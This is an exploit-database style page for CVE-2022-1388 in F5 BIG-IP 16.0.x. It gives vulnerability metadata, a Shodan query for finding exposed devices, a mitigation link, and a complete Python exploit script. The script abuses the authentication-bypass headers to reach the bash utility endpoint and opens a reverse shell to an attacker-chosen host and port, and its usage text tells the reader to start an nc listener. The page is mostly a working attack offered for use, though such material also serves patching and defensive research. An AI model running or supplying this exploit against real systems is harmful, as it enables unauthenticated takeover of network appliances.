F5 BIG-IP 16.0.x - Remote Code Execution (RCE)

vendor:

BIG-IP

by:

Yesith Alvarez

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: BIG-IP

Affected Version From: 16.0.x

Affected Version To: 16.0.x

Patch Exists: YES

Related CWE: CVE-2022-1388

CPE: a:f5:big-ip

Metasploit: https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388-remote/, https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/

Other Scripts:

Tags: f5,bigip,cve,cve2022,rce,mirai,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://twitter.com/GossiTheDog/status/1523566937414193153, https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/, https://support.f5.com/csp/article/K23605346, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

Nuclei Metadata: {'max-request': 2, 'shodan-query': 'http.title:"BIG-IP®-+Redirect" +"Server"', 'verified': True, 'vendor': 'f5', 'product': 'big-ip_access_policy_manager'}

Platforms Tested:

2020

F5 BIG-IP 16.0.x – Remote Code Execution (RCE)

A vulnerability in F5 BIG-IP 16.0.x could allow an unauthenticated, remote attacker to execute arbitrary code on the system. The vulnerability is due to improper validation of user-supplied input by the affected software. An attacker could exploit this vulnerability by sending a crafted request to the affected system. A successful exploit could allow the attacker to execute arbitrary code on the system.

Mitigation:

F5 has released a security advisory and software updates at the following link: https://support.f5.com/csp/article/K52145254

Source

Exploit-DB raw data:

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x 
# CVE : CVE-2022-1388

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  ___       __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \|__ \     /_ |___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) |  ) |_____| | __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /  / /______| ||__ < > _ < > _ < 
 | |____   \  /  | |____    / /_| |_| / /_ / /_      | |___) | (_) | (_) |
  \_____|   \/   |______|  |____|\___/____|____|     |_|____/ \___/ \___/ 
                                                                          
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    ''')   

def exploit(url, lhost, lport):
	url = url + 'mgmt/tm/util/bash'
	data = {
		"command":"run",
		"utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
		
	}
	headers = {
		'Authorization': 'Basic YWRtaW46',		
		'Connection':'keep-alive, X-F5-Auth-Token',
		'X-F5-Auth-Token': '0'

	}
	s = Session()
	req = Request('POST', url, json=data, headers=headers)
	prepped = req.prepare()
	del prepped.headers['Content-Type']
	resp = s.send(prepped,
	    verify=False,
	    timeout=15
	)
	#print(prepped.headers)
	#print(url)
	#print(resp.headers)
	#print(resp.json())
	print(resp.status_code)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
    	print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
    	print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
    	print('[+] Do not forget to run the listener: nc -lvp 4444\n')
    	exit(0)
    else:
    	exploit(sys.argv[1],sys.argv[2],sys.argv[3])